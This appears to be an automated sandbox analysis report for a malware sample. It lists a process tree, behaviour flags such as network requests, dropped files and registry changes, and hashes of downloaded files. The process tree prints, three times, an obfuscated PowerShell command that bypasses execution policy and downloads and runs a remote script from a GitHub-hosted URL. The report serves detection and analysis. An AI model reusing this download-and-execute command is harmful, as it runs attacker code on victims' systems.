C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1820
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:776
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3908
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
7a7c21ef2e104ca7d3f9b7bd613f37c3
SHA11a0785edf545b7ad9f269a837eab717a581d52d9
SHA256cb98c79a4262bfdb9cd377214fa1b36d1a5b36801ae32f3f3750ff06f9b92656
SHA51299c6f6139c4c2959d65244de127ba82490d5acdef13412d95601d633b5ece6c64a7b54f1fe9ad36534594b37efad50ee96f0e7f5fa0c5ac51ff12d58a2643371
-
MD5
302a02846f4909a4b0b0208d46e76def
SHA147352cfd86f183bb9a0e8f533834baf1b6f99ff5
SHA2560201508412b3feef74b094b7763d0a55682cdc2475adc34b6b1d1b41a22744a8
SHA512b4d240f5a53d2caa891c4d9c3266746aee7cbf2b9b3f9a3de10fdae20914cdf347ec1fc134920cdb6eb60b858687dcc2294f774e2c7130e415dcbb3514a6c1d0
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
00fb904b2dd958760943b89400e9b7f9
SHA18c825862b6f70cbaef991525f31100f713e61e7d
SHA256392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a
SHA512ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a
-
MD5
d918465a7e97bbebd18cb7b3f397ca4e
SHA15b4f34a70c30d0d6f6dba1adb80b04b96c2e32f8
SHA256c7626fbf57d4ef1244b729b4be74d1f50d8760e5c47b3ee816f3ac6847107b0f
SHA5125d855df49eb6af525976a3c719049ab8a35df864c2b93838359ef8cd9187e9cd02f377a4d109adb142c9d5bd773c652f27953a1906d4558e49ee819f560314df
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
1cab44a147bebba2fecbf54cdaeb058c
SHA1ec57393fdf8d33ceb2ce2c6f4d0022c960e95885
SHA2560bcad8eb0a40b25452ff2538781db069805d4af6723736d770062fc4c8a15238
SHA512819738d653095ba338d98dfefcb164ce90c972eec81eb9986c779b0aeb51f0c1176a034a7b131ccc431f73a41422a206c796aa38e9622e88438097f3bb945184
-
MD5
b110f38845e18a04ab59a7d8a134ef40
SHA18119030034e6fbe62d875e824b5233c1f29d61a0
SHA2561cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea
SHA51280eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223
-
MD5
5768a809b9fcbff117dffa8cbf2e8852
SHA1a056e76d15bc7509d0361175b2ae4ba348460cd6
SHA2568ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094
SHA51299d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b